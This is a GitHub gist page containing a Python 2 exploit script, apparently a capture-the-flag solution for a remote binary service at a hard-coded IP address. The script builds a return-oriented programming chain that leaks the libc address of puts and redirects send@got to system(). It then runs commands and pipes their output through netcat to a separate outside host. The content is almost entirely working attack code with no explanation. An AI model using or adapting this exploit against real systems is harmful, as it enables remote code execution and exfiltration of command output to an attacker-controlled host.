Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
#!/usr/bin/python
from Pwn import *
p = Pwn(host='54.152.37.20',port=24242)
# p = Pwn(port=24242)
def exploit():
shell = raw_input('> ')
back_connect = shell + ' | nc 128.199.171.28 8001'
rop = [
0x8048740, # send
0x080578f8, # pop 4 ; ret
0x4, # fd
0x0805f02c, # puts
8, # size
0x0, # flag
0x8048720, # recv
0x080578f8, # pop 4 ; ret
0x4, # fd
0x0805f068, # overwrite send@got with system
4 + len(back_connect) + 1, # size
0x6, # flag
0x08048878, # system
0x0805f068 + 4
]
payload = 'AAAAAAA' + p.pA(rop)
payload+= 'A'*(127 - len(payload))
payload+= '\x00'*4 # cookie ^ zero = cookie
payload+= '\x00'*4
payload+= '\x00'*4 # use the same ebp
payload+= p.pack(0x8e0 ^ 0x9e8) # point save ebp to own buffer :D
payload+= p.pack(0x08056b39 ^ 0x08056AFA) # own ret address : nop; leave ; ret
payload+= '\x00'*4 # use same args
payload+= p.pack(0x9e) # break the loop
payload+= 'A'*4
p.connect()
p.send('\xff' + payload)
leak = p.recv(8)
puts_addr = p.unpack(leak[:4])
system_addr = puts_addr - p.get_libc_offset(puts_addr,'puts')
print '[+] puts():',hex(puts_addr)
print '[+] system():',hex(system_addr)
p.send(p.pack(system_addr) + back_connect)
# p.io()
exploit()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.
You signed in with another tab or window. Reload to refresh your session. You signed out in another tab or window. Reload to refresh your session.